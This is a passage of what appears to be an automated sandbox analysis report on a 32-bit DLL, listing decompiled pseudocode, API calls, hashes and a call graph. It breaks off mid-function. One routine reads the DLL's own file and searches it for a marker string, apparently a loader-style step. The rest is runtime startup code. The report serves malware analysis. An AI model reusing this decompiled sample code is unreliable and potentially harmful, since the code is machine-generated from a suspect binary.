17509 6da87e2d 17507->17509 17508 6da81770 43 API calls 17510 6da86cbe 17508->17510 17511 6da81770 43 API calls 17509->17511 17512 6da82160 43 API calls 17510->17512 17521 6da86cc3 std::ios_base::_Ios_base_dtor 17510->17521 17514 6da87e55 17511->17514 17512->17521 17513->17490 17513->17508 17516 6da81770 43 API calls 17514->17516 17515 6da81770 43 API calls 17517 6da86d58 17515->17517 17518 6da87e7d 17516->17518 17522 6da82160 43 API calls 17517->17522 17528 6da86d5d std::ios_base::_Ios_base_dtor 17517->17528 17519 6da81770 43 API calls 17518->17519 17520 6da87ea5 17519->17520 17523 6da81770 43 API calls 17520->17523 17521->17490 17521->17515 17522->17528 17525 6da87ed3 17523->17525 17524 6da81770 43 API calls 17526 6da86df2 17524->17526 17527 6da81770 43 API calls 17525->17527 17530 6da82160 43 API calls 17526->17530 17538 6da86df7 std::ios_base::_Ios_base_dtor 17526->17538 
17134->17117 17136 6da9fb09 17135->17136 17137 6da9fb16 17135->17137 17138 6da90403 __dosmaperr 14 API calls 17136->17138 17139 6da9fb5f 17137->17139 17141 6da9fb3d 17137->17141 17145 6da9fb0e 17138->17145 17140 6da90403 __dosmaperr 14 API calls 17139->17140 17142 6da9fb64 17140->17142 17143 6da9fa56 ___scrt_uninitialize_crt 45 API calls 17141->17143 17144 6da8dabf ___std_exception_copy 41 API calls 17142->17144 17143->17145 17144->17145 17145->17112 17146->17121 17147->17104 17149 6da8c3a1 17148->17149 17150 6da8c577 17148->17150 17152 6da8d4e3 17149->17152 17156 6da8d630 17150->17156 17153 6da8d50d 17152->17153 17154 6da8d4ee 17152->17154 17153->17075 17155 6da8d4f8 RtlDeleteCriticalSection 17154->17155 17155->17153 17155->17155 17161 6da8d5ac 17156->17161 17159 6da8d662 TlsFree 17160 6da8d656 17159->17160 17160->17149 17162 6da8d5e7 17161->17162 17163 6da8d5c4 17161->17163 17162->17159 17162->17160 17163->17162 17167 6da8d512 17163->17167 17166 6da8d5d9 GetProcAddress 17166->17162 17173 6da8d51e ___vcrt_FlsFree 17167->17173 17168 6da8d592 17168->17162 17168->17166 17169 6da8d534 LoadLibraryExW 17170 6da8d599 17169->17170 17171 6da8d552 GetLastError 17169->17171 17170->17168 17172 6da8d5a1 FreeLibrary 17170->17172 17171->17173 17172->17168 17173->17168 17173->17169 17174 6da8d574 LoadLibraryExW 17173->17174 17174->17170 17174->17173 17180 6da920a5 17175->17180 17178 6da8c56d ___vcrt_uninitialize_ptd 6 API calls 17179 6da89a2f 17178->17179 17179->17031 17183 6da92ead 17180->17183 17184 6da8964d 17183->17184 17185 6da92eb7 17183->17185 17184->17178 17187 6da96752 17185->17187 17188 6da965dd std::_Lockit::_Lockit 5 API calls 17187->17188 17189 6da9676e 17188->17189 17190 6da96789 TlsFree 17189->17190 17191 6da96777 17189->17191 17191->17184 17192->17008 20550 6da9a340 20551 6da9a359 20550->20551 20552 6da9a377 20550->20552 20551->20552 20553 6da9580c 2 API calls 20551->20553 20553->20551

              Control-flow Graph

              C-Code - Quality: 64%
              			E6DA814D0(void* __ebx, struct HINSTANCE__** __ecx, void* __eflags) {
              				struct HINSTANCE__* _v8;
              				intOrPtr _v16;
              				char _v17;
              				long _v24;
              				struct HINSTANCE__** _v28;
              				long _v32;
              				void* _v36;
              				struct _OVERLAPPED* _v40;
              				char* _v44;
              				struct HINSTANCE__* _v48;
              				struct HINSTANCE__* _v52;
              				struct HINSTANCE__* _v56;
              				struct HINSTANCE__* _v72;
              				intOrPtr* _v92;
              				void* _t49;
              				long _t50;
              				void* _t51;
              				void* _t56;
              				intOrPtr _t57;
              				struct HINSTANCE__* _t60;
              				struct HINSTANCE__* _t65;
              				void* _t68;
              				intOrPtr _t69;
              				intOrPtr* _t73;
              				struct HINSTANCE__* _t78;
              				char _t82;
              				struct _OVERLAPPED* _t86;
              				void* _t88;
              				intOrPtr* _t93;
              				struct HINSTANCE__** _t95;
              				intOrPtr* _t98;
              				struct HINSTANCE__* _t99;
              				struct HINSTANCE__** _t100;
              				intOrPtr _t101;
              				void* _t104;
              				struct HINSTANCE__* _t105;
              				intOrPtr _t106;
              				char* _t109;
              				struct HINSTANCE__** _t110;
              				void* _t112;
              				CHAR* _t115;
              				void* _t116;
              				void* _t117;
              				struct HINSTANCE__* _t118;
              				struct HINSTANCE__** _t120;
              				intOrPtr* _t122;
              				struct HINSTANCE__** _t124;
              				intOrPtr _t127;
              				intOrPtr _t131;
              
              				_t127 = _t131;
              				_push(0xffffffff);
              				_push(E6DAA2315);
              				_push( *[fs:0x0]);
              				 *[fs:0x0] = _t131;
              				_push(__ebx);
              				_v72 = 0;
              				_v28 = __ecx;
              				_v56 = 0;
              				_v52 = 0xf;
              				_v72 = 0;
              				_push(0x30c);
              				_v8 = 0;
              				_t115 = E6DA8DB20();
              				GetModuleFileNameA(0, _t115, 0x30c);
              				_t109 = 0;
              				_v48 = 0;
              				_t86 = 0;
              				_v44 = 0;
              				_v40 = 0;
              				_v8 = 1;
              				_t49 = CreateFileA(_t115, 0x80000000, 3, 0, 3, 0, 0); // executed
              				_t116 = _t49;
              				_t50 = GetFileSize(_t116, 0);
              				_v24 = _t50;
              				_t51 = LocalAlloc(0, _t50);
              				_v36 = _t51;
              				_v32 = 0;
              				ReadFile(_t116, _t51, _v24,  &_v32, 0); // executed
              				FindCloseChangeNotification(_t116); // executed
              				_t117 = 0;
              				if(_v24 <= 0) {
              					_t118 = 0;
              				} else {
              					do {
              						_t82 =  *((intOrPtr*)(_t117 + _v36));
              						_v17 = _t82;
              						if(_t109 == _t86) {
              							E6DA818A0( &_v48, _t109,  &_v17);
              							_t86 = _v40;
              							_t109 = _v44;
              						} else {
              							 *_t109 = _t82;
              							_t109 = _t109 + 1;
              							_v44 = _t109;
              						}
              						_t117 = _t117 + 1;
              					} while (_t117 < _v24);
              					_t118 = _v48;
              				}
              				_t56 = E6DA8B200(_t118, 0, _t109 - _t118);
              				_t92 =  !=  ? _t56 : _t109;
              				_t144 = ( !=  ? _t56 : _t109) - _t109;
              				_t110 = _v28;
              				 *_t110 = 0;
              				_t110[4] = 0;
              				_t110[5] = 0xf;
              				 *_t110 = 0;
              				if(( !=  ? _t56 : _t109) == _t109) {
              					_t93 = 0;
              					_t32 = _t93 + 1; // 0x1
              					_t104 = _t32;
              					asm("o16 nop [eax+eax]");
              					do {
              						_t57 =  *_t93;
              						_t93 = _t93 + 1;
              					} while (_t57 != 0);
              					_push(_t93 - _t104);
              					_t95 = _t110;
              					E6DA81770(_t95, 0);
              					if(_t118 == 0) {
              						goto L13;
              					} else {
              						_t88 = _t86 - _t118;
              						_t60 = _t118;
              						if(_t88 < 0x1000) {
              							goto L12;
              						} else {
              							_t118 =  *(_t118 - 4);
              							_t88 = _t88 + 0x23;
              							if(_t60 - _t118 + 0xfffffffc <= 0x1f) {
              								goto L12;
              							} else {
              								goto L19;
              							}
              						}
              					}
              				} else {
              					_push(0x21);
              					_t95 = _t110;
              					E6DA81770(_t95, "gjdhkdfgkjsdghfkjsdhkjslfdghsdkjl");
              					if(_t118 == 0) {
              						L13:
              						 *[fs:0x0] = _v16;
              						return _t110;
              					} else {
              						_t88 = _t86 - _t118;
              						_t78 = _t118;
              						if(_t88 < 0x1000) {
              							L12:
              							_push(_t88);
              							E6DA893C9(_t118);
              							goto L13;
              						} else {
              							_t118 =  *(_t118 - 4);
              							_t88 = _t88 + 0x23;
              							if(_t78 - _t118 + 0xfffffffc > 0x1f) {
              								L19:
              								E6DA8DACF(_t88, _t95, _t104);
              								asm("int3");
              								asm("int3");
              								asm("int3");
              								asm("int3");
              								asm("int3");
              								asm("int3");
              								asm("int3");
              								asm("int3");
              								_push(_t118);
              								_t120 = _t95;
              								_t65 =  *_t120;
              								if(_t65 == 0) {
              									L25:
              									return _t65;
              								} else {
              									_t98 = _t120[2] - _t65;
              									if(_t98 < 0x1000) {
              										L24:
              										_push(_t98);
              										_t65 = E6DA893C9(_t65);
              										 *_t120 = 0;
              										_t120[1] = 0;
              										_t120[2] = 0;
              										goto L25;
              									} else {
              										_t105 =  *(_t65 - 4);
              										_t98 = _t98 + 0x23;
              										if(_t65 - _t105 + 0xfffffffc > 0x1f) {
              											_t68 = E6DA8DACF(_t88, _t98, _t105);
              											asm("int3");
              											asm("int3");
              											asm("int3");
              											_push(_t120);
              											_t122 = _t98;
              											_t99 =  *(_t122 + 0x14);
              											if(_t99 < 0x10) {
              												L32:
              												 *(_t122 + 0x10) = 0;
              												 *(_t122 + 0x14) = 0xf;
              												 *_t122 = 0;
              												return _t68;
              											} else {
              												_t69 =  *_t122;
              												_t100 =  &(_t99->i);
              												if(_t100 < 0x1000) {
              													L31:
              													_push(_t100);
              													_t68 = E6DA893C9(_t69);
              													goto L32;
              												} else {
              													_t106 =  *((intOrPtr*)(_t69 - 4));
              													_t100 =  &(_t100[8]);
              													if(_t69 - _t106 + 0xfffffffc > 0x1f) {
              														E6DA8DACF(_t88, _t100, _t106);
              														asm("int3");
              														asm("int3");
              														asm("int3");
              														asm("int3");
              														asm("int3");
              														asm("int3");
              														_push(_t127);
              														_t107 = _v92;
              														_t73 = _v92;
              														_push(_t122);
              														_t124 = _t100;
              														_push(_t110);
              														_t43 = _t73 + 1; // 0x1
              														_t112 = _t43;
              														 *_t124 = 0;
              														_t124[4] = 0;
              														_t124[5] = 0xf;
              														do {
              															_t101 =  *_t73;
              															_t73 = _t73 + 1;
              														} while (_t101 != 0);
              														_push(_t73 - _t112);
              														E6DA81770(_t124, _t107);
              														return _t124;
              													} else {
              														_t69 = _t106;
              														goto L31;
              													}
              												}
              											}
              										} else {
              											_t65 = _t105;
              											goto L24;
              										}
              									}
              								}
              							} else {
              								goto L12;
              							}
              						}
              					}
              				}
              			}





















































              APIs
              • GetModuleFileNameA.KERNEL32(00000000,00000000,0000030C,?), ref: 6DA81528
              • CreateFileA.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000), ref: 6DA81550
              • GetFileSize.KERNEL32(00000000,00000000), ref: 6DA8155A
              • LocalAlloc.KERNEL32(00000000,00000000), ref: 6DA81565
              • ReadFile.KERNELBASE(00000000,00000000,?,?,00000000), ref: 6DA8157B
              • FindCloseChangeNotification.KERNELBASE(00000000), ref: 6DA81582
              Strings
              • gjdhkdfgkjsdghfkjsdhkjslfdghsdkjl, xrefs: 6DA815FC
              Memory Dump Source
              • Source File: 00000000.00000002.321126809.000000006DA81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA80000, based on PE: true
              • Associated: 00000000.00000002.321118914.000000006DA80000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321283455.000000006DAA4000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321302763.000000006DAB3000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321320388.000000006DAB4000.00000008.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321422081.000000006DAD4000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321433207.000000006DAD6000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6da80000_loaddll32.jbxd
              Similarity
              • API ID: File$AllocChangeCloseCreateFindLocalModuleNameNotificationReadSize
              • String ID: gjdhkdfgkjsdghfkjsdhkjslfdghsdkjl
              • API String ID: 664754120-448965468
              • Opcode ID: 20cad69cf58fe0f53f03f38f9266d19976946d6f153f9c23272cbb4097554140
              • Instruction ID: ba08a7b8226c77d2c59fb53c6336ff364c357bc3ec8c4e4066879b73f06f27d2
              • Opcode Fuzzy Hash: 20cad69cf58fe0f53f03f38f9266d19976946d6f153f9c23272cbb4097554140
              • Instruction Fuzzy Hash: 53514771D092159FEB118FA8CD84BBEFBF8EF09304F190229ED55A7281D7B45D808BA0
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              C-Code - Quality: 87%
              			E6DA89988(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
              				intOrPtr _t34;
              				signed int _t40;
              				signed int _t41;
              				signed int _t45;
              				signed char _t54;
              				signed int _t56;
              				signed int _t58;
              				void* _t61;
              				void* _t68;
              				signed int _t72;
              				signed int _t76;
              				signed int _t80;
              				void* _t82;
              
              				_t68 = __edx;
              				_push(0x10);
              				_push(0x6dab10d0);
              				E6DA89CA0(__ebx, __edi, __esi);
              				_t34 =  *0x6dad51a4; // 0x1
              				if(_t34 > 0) {
              					 *0x6dad51a4 = _t34 - 1;
              					 *(_t82 - 0x1c) = 1;
              					 *(_t82 - 4) =  *(_t82 - 4) & 0x00000000;
              					 *((char*)(_t82 - 0x20)) = E6DA89558();
              					 *(_t82 - 4) = 1;
              					__eflags =  *0x6dad5180 - 2;
              					if( *0x6dad5180 != 2) {
              						E6DA89EC6(_t68, 1, __esi, 7);
              						asm("int3");
              						_push(0xc);
              						_push(0x6dab10f8);
              						E6DA89CA0(__ebx, 1, __esi);
              						_t72 =  *(_t82 + 0xc);
              						__eflags = _t72;
              						if(_t72 != 0) {
              							L9:
              							 *(_t82 - 4) =  *(_t82 - 4) & 0x00000000;
              							__eflags = _t72 - 1;
              							if(_t72 == 1) {
              								L12:
              								_t58 =  *(_t82 + 0x10);
              								_t76 = E6DA89B43( *((intOrPtr*)(_t82 + 8)), _t72, _t58);
              								 *(_t82 - 0x1c) = _t76;
              								__eflags = _t76;
              								if(_t76 != 0) {
              									_t41 = E6DA8982E(_t61,  *((intOrPtr*)(_t82 + 8)), _t72, _t58); // executed
              									_t76 = _t41;
              									 *(_t82 - 0x1c) = _t76;
              									__eflags = _t76;
              									if(_t76 != 0) {
              										goto L14;
              									}
              								}
              							} else {
              								__eflags = _t72 - 2;
              								if(_t72 == 2) {
              									goto L12;
              								} else {
              									_t58 =  *(_t82 + 0x10);
              									L14:
              									_push(_t58);
              									_t76 = E6DA864F0( *((intOrPtr*)(_t82 + 8)), _t72);
              									 *(_t82 - 0x1c) = _t76;
              									__eflags = _t72 - 1;
              									if(_t72 == 1) {
              										__eflags = _t76;
              										if(_t76 == 0) {
              											_push(_t58);
              											_t45 = E6DA864F0( *((intOrPtr*)(_t82 + 8)), _t42);
              											__eflags = _t58;
              											_t25 = _t58 != 0;
              											__eflags = _t25;
              											_push((_t45 & 0xffffff00 | _t25) & 0x000000ff);
              											E6DA89988(_t58, _t68, _t72, _t76, _t25);
              											_pop(_t61);
              											E6DA89B43( *((intOrPtr*)(_t82 + 8)), _t76, _t58);
              										}
              									}
              									__eflags = _t72;
              									if(_t72 == 0) {
              										L19:
              										_t76 = E6DA8982E(_t61,  *((intOrPtr*)(_t82 + 8)), _t72, _t58);
              										 *(_t82 - 0x1c) = _t76;
              										__eflags = _t76;
              										if(_t76 != 0) {
              											_t76 = E6DA89B43( *((intOrPtr*)(_t82 + 8)), _t72, _t58);
              											 *(_t82 - 0x1c) = _t76;
              										}
              									} else {
              										__eflags = _t72 - 3;
              										if(_t72 == 3) {
              											goto L19;
              										}
              									}
              								}
              							}
              							 *(_t82 - 4) = 0xfffffffe;
              							_t40 = _t76;
              						} else {
              							__eflags =  *0x6dad51a4 - _t72; // 0x1
              							if(__eflags > 0) {
              								goto L9;
              							} else {
              								_t40 = 0;
              							}
              						}
              						 *[fs:0x0] =  *((intOrPtr*)(_t82 - 0x10));
              						return _t40;
              					} else {
              						E6DA89623(__ebx, _t61, 1, __esi);
              						E6DA8A090();
              						E6DA8A0F1();
              						 *0x6dad5180 =  *0x6dad5180 & 0x00000000;
              						 *(_t82 - 4) =  *(_t82 - 4) & 0x00000000;
              						E6DA89A1D();
              						_t54 = E6DA897C4( *((intOrPtr*)(_t82 + 8)), 0);
              						asm("sbb esi, esi");
              						_t80 =  ~(_t54 & 0x000000ff) & 1;
              						__eflags = _t80;
              						 *(_t82 - 0x1c) = _t80;
              						 *(_t82 - 4) = 0xfffffffe;
              						E6DA89A2A();
              						_t56 = _t80;
              						goto L4;
              					}
              				} else {
              					_t56 = 0;
              					L4:
              					 *[fs:0x0] =  *((intOrPtr*)(_t82 - 0x10));
              					return _t56;
              				}
              			}

















              APIs
              • __RTC_Initialize.LIBCMT ref: 6DA899CF
              • ___scrt_uninitialize_crt.LIBCMT ref: 6DA899E9
              Memory Dump Source
              • Source File: 00000000.00000002.321126809.000000006DA81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA80000, based on PE: true
              • Associated: 00000000.00000002.321118914.000000006DA80000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321283455.000000006DAA4000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321302763.000000006DAB3000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321320388.000000006DAB4000.00000008.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321422081.000000006DAD4000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321433207.000000006DAD6000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6da80000_loaddll32.jbxd
              Similarity
              • API ID: Initialize___scrt_uninitialize_crt
              • String ID:
              • API String ID: 2442719207-0
              • Opcode ID: a236505dce262cc4b1e070c093390730346c0fb1fe1668dedce63ac4ddce6055
              • Instruction ID: 6c6d5e22557d71d5ba0ee6facce26fbe5f88474d98998ba31da6ec8e35a1386a
              • Opcode Fuzzy Hash: a236505dce262cc4b1e070c093390730346c0fb1fe1668dedce63ac4ddce6055
              • Instruction Fuzzy Hash: 9741C672D0C21AAFDB118F94CB00BBEBAB9EF85B55F064519ED1567182D7308EC29B90
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 965 6da89a38-6da89a49 call 6da89ca0 968 6da89a5a-6da89a61 965->968 969 6da89a4b-6da89a51 965->969 971 6da89a6d-6da89a81 dllmain_raw 968->971 972 6da89a63-6da89a66 968->972 969->968 970 6da89a53-6da89a55 969->970 975 6da89b33-6da89b42 970->975 973 6da89b2a-6da89b31 971->973 974 6da89a87-6da89a98 dllmain_crt_dispatch 971->974 972->971 976 6da89a68-6da89a6b 972->976 973->975 974->973 977 6da89a9e-6da89ab0 call 6da864f0 974->977 976->977 980 6da89ad9-6da89adb 977->980 981 6da89ab2-6da89ab4 977->981 983 6da89add-6da89ae0 980->983 984 6da89ae2-6da89af3 dllmain_crt_dispatch 980->984 981->980 982 6da89ab6-6da89ad4 call 6da864f0 call 6da89988 dllmain_raw 981->982 982->980 983->973 983->984 984->973 986 6da89af5-6da89b27 dllmain_raw 984->986 986->973
              C-Code - Quality: 89%
              			E6DA89A38(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
              				signed int _t24;
              				signed int _t25;
              				signed int _t29;
              				signed int _t35;
              				void* _t37;
              				void* _t40;
              				signed int _t42;
              				signed int _t45;
              				void* _t47;
              				void* _t52;
              
              				_t40 = __edx;
              				_push(0xc);
              				_push(0x6dab10f8);
              				E6DA89CA0(__ebx, __edi, __esi);
              				_t42 =  *(_t47 + 0xc);
              				if(_t42 != 0) {
              					L3:
              					 *(_t47 - 4) =  *(_t47 - 4) & 0x00000000;
              					__eflags = _t42 - 1;
              					if(_t42 == 1) {
              						L6:
              						_t35 =  *(_t47 + 0x10);
              						_t45 = E6DA89B43( *((intOrPtr*)(_t47 + 8)), _t42, _t35);
              						 *(_t47 - 0x1c) = _t45;
              						__eflags = _t45;
              						if(_t45 == 0) {
              							L16:
              							 *(_t47 - 4) = 0xfffffffe;
              							_t24 = _t45;
              							L17:
              							 *[fs:0x0] =  *((intOrPtr*)(_t47 - 0x10));
              							return _t24;
              						}
              						_t25 = E6DA8982E(_t37,  *((intOrPtr*)(_t47 + 8)), _t42, _t35); // executed
              						_t45 = _t25;
              						 *(_t47 - 0x1c) = _t45;
              						__eflags = _t45;
              						if(_t45 == 0) {
              							goto L16;
              						}
              						L8:
              						_push(_t35);
              						_t45 = E6DA864F0( *((intOrPtr*)(_t47 + 8)), _t42);
              						 *(_t47 - 0x1c) = _t45;
              						__eflags = _t42 - 1;
              						if(_t42 == 1) {
              							__eflags = _t45;
              							if(_t45 == 0) {
              								_push(_t35);
              								_t29 = E6DA864F0( *((intOrPtr*)(_t47 + 8)), _t26);
              								__eflags = _t35;
              								_t14 = _t35 != 0;
              								__eflags = _t14;
              								_push((_t29 & 0xffffff00 | _t14) & 0x000000ff);
              								E6DA89988(_t35, _t40, _t42, _t45, _t14);
              								_pop(_t37);
              								E6DA89B43( *((intOrPtr*)(_t47 + 8)), _t45, _t35);
              							}
              						}
              						__eflags = _t42;
              						if(_t42 == 0) {
              							L13:
              							_t45 = E6DA8982E(_t37,  *((intOrPtr*)(_t47 + 8)), _t42, _t35);
              							 *(_t47 - 0x1c) = _t45;
              							__eflags = _t45;
              							if(_t45 != 0) {
              								_t45 = E6DA89B43( *((intOrPtr*)(_t47 + 8)), _t42, _t35);
              								 *(_t47 - 0x1c) = _t45;
              							}
              							goto L16;
              						} else {
              							__eflags = _t42 - 3;
              							if(_t42 != 3) {
              								goto L16;
              							}
              							goto L13;
              						}
              					}
              					__eflags = _t42 - 2;
              					if(_t42 == 2) {
              						goto L6;
              					}
              					_t35 =  *(_t47 + 0x10);
              					goto L8;
              				}
              				_t52 =  *0x6dad51a4 - _t42; // 0x1
              				if(_t52 > 0) {
              					goto L3;
              				}
              				_t24 = 0;
              				goto L17;
              			}














              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.321126809.000000006DA81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA80000, based on PE: true
              • Associated: 00000000.00000002.321118914.000000006DA80000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321283455.000000006DAA4000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321302763.000000006DAB3000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321320388.000000006DAB4000.00000008.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321422081.000000006DAD4000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321433207.000000006DAD6000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6da80000_loaddll32.jbxd
              Similarity
              • API ID: dllmain_raw$dllmain_crt_dispatch
              • String ID:
              • API String ID: 3136044242-0
              • Opcode ID: 0711047e2bf707177335fe6cbd54c37caa507a03e9fad230520e57229bb99539
              • Instruction ID: 08d82b0674fff54fe71a2aa84e1b358986a035e3e870ff74bd85f9b96e1ad2d2
              • Opcode Fuzzy Hash: 0711047e2bf707177335fe6cbd54c37caa507a03e9fad230520e57229bb99539
              • Instruction Fuzzy Hash: 5621A375D0C21AAFDB218E54CF44E7F7A79EB85B94F064415FC146B252D3308E828BD0
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              C-Code - Quality: 19%
              			E6DA9A221() {
              				intOrPtr _v8;
              				signed int _v12;
              				WCHAR* _t5;
              				void* _t6;
              				intOrPtr _t9;
              				WCHAR* _t10;
              				WCHAR* _t19;
              				WCHAR* _t26;
              				WCHAR* _t29;
              
              				_push(_t21);
              				_t5 = GetEnvironmentStringsW();
              				_t29 = _t5;
              				if(_t29 != 0) {
              					_t6 = E6DA9A1EA(_t29);
              					_t19 = 0;
              					_v12 = _t6 - _t29 >> 1;
              					_t9 = E6DA98F81(0, 0, _t29, _t6 - _t29 >> 1, 0, 0, 0, 0);
              					_v8 = _t9;
              					if(_t9 != 0) {
              						_t10 = E6DA9458B(_t9); // executed
              						_t26 = _t10;
              						_push(0);
              						if(_t26 != 0) {
              							_push(0);
              							_push(_v8);
              							_push(_t26);
              							_push(_v12);
              							_push(_t29);
              							_push(0);
              							_push(0);
              							if(E6DA98F81() != 0) {
              								E6DA94760(0);
              								_t19 = _t26;
              							} else {
              								E6DA94760(_t26);
              							}
              							FreeEnvironmentStringsW(_t29);
              							_t5 = _t19;
              						} else {
              							E6DA94760();
              							FreeEnvironmentStringsW(_t29);
              							_t5 = 0;
              						}
              					} else {
              						FreeEnvironmentStringsW(_t29);
              						_t5 = 0;
              					}
              				}
              				return _t5;
              			}













              APIs
              • GetEnvironmentStringsW.KERNEL32 ref: 6DA9A229
                • Part of subcall function 6DA98F81: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,6DA97659,?,00000000,-00000008), ref: 6DA9902D
              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6DA9A261
              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6DA9A281
              Memory Dump Source
              • Source File: 00000000.00000002.321126809.000000006DA81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA80000, based on PE: true
              • Associated: 00000000.00000002.321118914.000000006DA80000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321283455.000000006DAA4000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321302763.000000006DAB3000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321320388.000000006DAB4000.00000008.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321422081.000000006DAD4000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321433207.000000006DAD6000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6da80000_loaddll32.jbxd
              Similarity
              • API ID: EnvironmentStrings$Free$ByteCharMultiWide
              • String ID:
              • API String ID: 158306478-0
              • Opcode ID: cf15da34657c48e4730c21e6ed1abb38830058b61196608147bae4b1be0d2f3a
              • Instruction ID: 3adca6da547702d7e42243ab49b4dddf3aaedfd03c98f5fd444dc930649f6b75
              • Opcode Fuzzy Hash: cf15da34657c48e4730c21e6ed1abb38830058b61196608147bae4b1be0d2f3a
              • Instruction Fuzzy Hash: ED1125B2D2D70A7FAB0113B55D88CAF29EEED8B29C7050116F902CD100FF60CD8141B2
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 1017 6da89881-6da8988f call 6da89ca0 call 6da89653 1021 6da89894-6da89897 1017->1021 1022 6da8989d-6da898b5 call 6da89558 1021->1022 1023 6da8996e 1021->1023 1027 6da898bb-6da898cc call 6da895b5 1022->1027 1028 6da89980-6da89987 call 6da89ec6 1022->1028 1025 6da89970-6da8997f 1023->1025 1033 6da8991b-6da89929 call 6da89964 1027->1033 1034 6da898ce-6da898f0 call 6da8a0c5 call 6da8a084 call 6da8a0a2 call 6da920e2 1027->1034 1033->1023 1039 6da8992b-6da89935 call 6da8a0bf 1033->1039 1034->1033 1053 6da898f2-6da898f9 call 6da8958a 1034->1053 1045 6da89956-6da8995f 1039->1045 1046 6da89937-6da89940 call 6da89713 1039->1046 1045->1025 1046->1045 1052 6da89942-6da89954 1046->1052 1052->1045 1053->1033 1057 6da898fb-6da89918 call 6da920b7 1053->1057 1057->1033
              C-Code - Quality: 80%
              			E6DA89881(void* __ebx, void* __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, void* __eflags) {
              				void* _t43;
              				char _t44;
              				signed int _t48;
              				signed int _t54;
              				signed int _t55;
              				signed int _t59;
              				signed char _t67;
              				signed int _t69;
              				void* _t80;
              				signed int _t86;
              				void* _t90;
              				void* _t102;
              				signed int _t110;
              				signed int _t115;
              				signed int _t119;
              				intOrPtr* _t121;
              				void* _t123;
              
              				_t113 = __esi;
              				_t106 = __edi;
              				_t105 = __edx;
              				_push(0x10);
              				E6DA89CA0(__ebx, __edi, __esi);
              				_t43 = E6DA89653(__ecx, __edx, 0); // executed
              				_t90 = 0x6dab10b0;
              				if(_t43 == 0) {
              					L11:
              					_t44 = 0;
              					__eflags = 0;
              					goto L12;
              				} else {
              					 *((char*)(_t123 - 0x1d)) = E6DA89558();
              					_t85 = 1;
              					 *((char*)(_t123 - 0x19)) = 1;
              					 *(_t123 - 4) =  *(_t123 - 4) & 0x00000000;
              					_t132 =  *0x6dad5180;
              					if( *0x6dad5180 != 0) {
              						E6DA89EC6(_t105, __edi, __esi, 7);
              						asm("int3");
              						_push(0x10);
              						_push(0x6dab10d0);
              						E6DA89CA0(1, __edi, __esi);
              						_t48 =  *0x6dad51a4; // 0x1
              						__eflags = _t48;
              						if(_t48 > 0) {
              							 *0x6dad51a4 = _t48 - 1;
              							 *(_t123 - 0x1c) = 1;
              							 *(_t123 - 4) =  *(_t123 - 4) & 0x00000000;
              							 *((char*)(_t123 - 0x20)) = E6DA89558();
              							 *(_t123 - 4) = 1;
              							__eflags =  *0x6dad5180 - 2;
              							if( *0x6dad5180 != 2) {
              								E6DA89EC6(_t105, 1, _t113, 7);
              								asm("int3");
              								_push(0xc);
              								_push(0x6dab10f8);
              								E6DA89CA0(1, 1, _t113);
              								_t110 =  *(_t123 + 0xc);
              								__eflags = _t110;
              								if(_t110 != 0) {
              									L23:
              									 *(_t123 - 4) =  *(_t123 - 4) & 0x00000000;
              									__eflags = _t110 - 1;
              									if(_t110 == 1) {
              										L26:
              										_t86 =  *(_t123 + 0x10);
              										_t115 = E6DA89B43( *((intOrPtr*)(_t123 + 8)), _t110, _t86);
              										 *(_t123 - 0x1c) = _t115;
              										__eflags = _t115;
              										if(_t115 != 0) {
              											_t55 = E6DA8982E(_t90,  *((intOrPtr*)(_t123 + 8)), _t110, _t86); // executed
              											_t115 = _t55;
              											 *(_t123 - 0x1c) = _t115;
              											__eflags = _t115;
              											if(_t115 != 0) {
              												goto L28;
              											}
              										}
              									} else {
              										__eflags = _t110 - 2;
              										if(_t110 == 2) {
              											goto L26;
